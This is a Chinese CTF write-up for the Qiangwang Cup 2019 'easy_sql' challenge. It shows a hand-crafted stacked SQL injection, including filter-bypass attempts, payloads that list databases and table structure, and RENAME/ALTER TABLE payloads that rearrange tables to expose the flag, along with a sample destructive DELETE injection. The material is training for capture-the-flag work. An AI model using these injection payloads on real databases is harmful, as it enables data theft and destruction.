WriteUp_easy_sql 堆叠注入 强网杯2019

题目描述

随便注

过程 :

打开后界面如下

屏幕截图 2022-12-10 171221

查看源码发现sqlmap是没有灵魂的 作者肯定是要让我们手工注入的 不尝试工具了

屏幕截图 2022-12-10 174000

注入点很清楚 加入单引号试错 提示sql语法错误

1
error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at

尝试联合注入

1
/?inject=1'  and1=2 union select database(),user() #

发现有过滤关键字

1
return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

尝试大小写绕过 套娃绕过 sql注释绕过 url编码绕过 空字节都失败了 放弃联合注入

UNION SELECT=>uNIon SElecT

union select=>//UNION//SELECT/**/

union select=>%75%6e%6f%69%6e %73%65%6c%65%63%74(url编码)

union select=>uniunionon seselectlect

union select=>%00 union select(空字节)

采用堆叠注入

定义:

Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection

原理:

在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语句为: Select * from products where productid=1;DELETE FROM products当执行查询后,第一条显示查询信息,第二条则将整个表进行删除

局限性:

堆叠注入的局限性在于并不是每一个环境下都可以执行,可能受到API或者数据库引擎不支持的限制,当然了权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序。

虽然我们前面提到了堆叠查询可以执行任意的sql语句,但是这种注入方式并不是十分的完美的。在我们的web系统中,因为代码通常只返回一个查询结果,因此,堆叠注入第二个语句产生错误或者结果只能被忽略,我们在前端界面是无法看到返回结果的。因此,在读取数据时,我们建议使用union(联合)注入。

1
http://61.147.171.105:64309/?inject=1%27;show%20databases;show%20tables;
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
array(1) {
  [0]=>
  string(11) "ctftraining"
}

array(1) {
  [0]=>
  string(18) "information_schema"
}

array(1) {
  [0]=>
  string(5) "mysql"
}

array(1) {
  [0]=>
  string(18) "performance_schema"
}

array(1) {
  [0]=>
  string(9) "supersqli"
}

array(1) {
  [0]=>
  string(4) "test"
}

array(1) {
  [0]=>
  string(16) "1919810931114514"
}

array(1) {
  [0]=>
  string(5) "words"
}

查到了所有数据库名和表名 探索数据库结构 desc命令是查看表结构的详细信息

1
?inject=1' and 1=2; desc `1919810931114514`;# 和 ?inject=1%27%20and%201=2;%20desc%20`words`;#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
array(6) {
  [0]=>
  string(4) "flag"
  [1]=>
  string(12) "varchar(100)"
  [2]=>
  string(2) "NO"
  [3]=>
  string(0) ""
  [4]=>
  NULL
  [5]=>
  string(0) ""
}
array(6) {
  [0]=>
  string(2) "id"
  [1]=>
  string(7) "int(10)"
  [2]=>
  string(2) "NO"
  [3]=>
  string(0) ""
  [4]=>
  NULL
  [5]=>
  string(0) ""
}

array(6) {
  [0]=>
  string(4) "data"
  [1]=>
  string(11) "varchar(20)"
  [2]=>
  string(2) "NO"
  [3]=>
  string(0) ""
  [4]=>
  NULL
  [5]=>
  string(0) ""
}

找到了flag所在的表 :1919810931114514

由主页面输入的1,2参数返回的值可看出默认查的是words表 而flag在另一个表中

此时我们需要利用主页面的查询接口查到flag的值

利用sql命令

1
?inject=1' or 1=1; rename tables words to words1;rename tables `1919810931114514` to words;alter table words change flag id varchar(100);--+

rename tables 命令

rename tables 旧表名 to 新表名

旧表必须存在 新表不一定存在若新表存在则语句失效 rename table 还可以在单个语句中重命名多个表

rename table old_table1 TO new_table1, old_table2 TO new_table2, old_table3 TO new_table3;

alter tables 命令

alter tables 旧表名 rename 新表名

alter table 表名 change 旧列名 新列名

1
alter table words change flag id                       varchar(100)

分析一下这条语句

将我们更改后的words表中的 列名 flag 改成 id

然后利用主页面模块的查询按钮查询 varchar(100) 数据得到flag